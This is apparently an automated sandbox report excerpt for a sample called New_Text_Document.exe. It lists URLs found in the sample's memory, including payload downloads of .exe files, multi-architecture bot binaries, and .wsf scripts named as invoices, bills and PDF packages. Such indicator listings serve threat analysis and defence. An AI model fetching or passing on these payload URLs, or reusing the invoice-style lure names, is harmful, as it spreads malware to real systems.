                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.61.15.164:27660/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.62.110.252:40050/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.65.205.108:17781/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.80.142.134:8969/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.80.148.158:20185/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.80.154.234:29307/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.80.166.183:53086/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.81.1.140:43486/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.81.108.230:24333/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.81.108.50:23045/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.81.170.27:11457/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.81.214.237:8572/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.81.254.242:49272/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.81.62.122:31707/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.81.97.91:1495/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.165.237.163:11364/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.168.62.77:52383/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.218.189.6:2560/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.228.106.27:30948/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.228.67.82:1051/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.234.218.38:22826/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.49.251.98:17972/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.0.253.152:39432/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.196.218.223:60546/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.2.251.137:56000/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.22.136.158:32729/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.228.107.192:13315/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.228.117.173:21845/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.228.234.91:14940/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.242.139.134:2601/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.254.38.74:62429/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.3.255.187:44255/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.33.116.171:43929/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.33.119.92:27102/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.33.122.235:28805/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.43.183.137:40609/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.102/FX_432661.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.161/Volity.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/114.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/2RHhc6op.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/6606.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/Adoc-PDFPasswordedaround_439681.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/Adoc-PDFPasswordedaround_723480.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/Bill-IDGT20232908_481367.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/Bill-IDGT20232908_810726.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/BillIDGT20232908_175902j.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/BillIDGT20232908_247310j.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/BillIDGT20232908_597820j.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/BillingReceiptID20232908_139562.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/C9tGYDop.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/Doct-AdobePDFPackageWebster_729146.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/Doct-AdobePDFPackageWebster_WFsGMK.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/InvoicIDGT20232908_653709.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/InvoiceBillIDGT20232908_175460.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/InvoiceBillIDGT20232908_175926.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/InvoiceGT20232908_175408.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/InvoiceGT20232908_364859.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/InvoiceGT20232908_497210.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/InvoiceIDGTIDGT20232908_679821j.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/InvoiceIDGTIDGT20232908_792480j.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/PPt-AdobePDFPackageWebster_178950.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/PPt-AdobePDFPackageWebster_632519.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/QVwO4Nop.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/QYvTERop.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/ReceiptINVO20232908_850294.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/RlYFQgop.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/WKus5wop.wsf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.50.9:222/t.png
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.mpsl
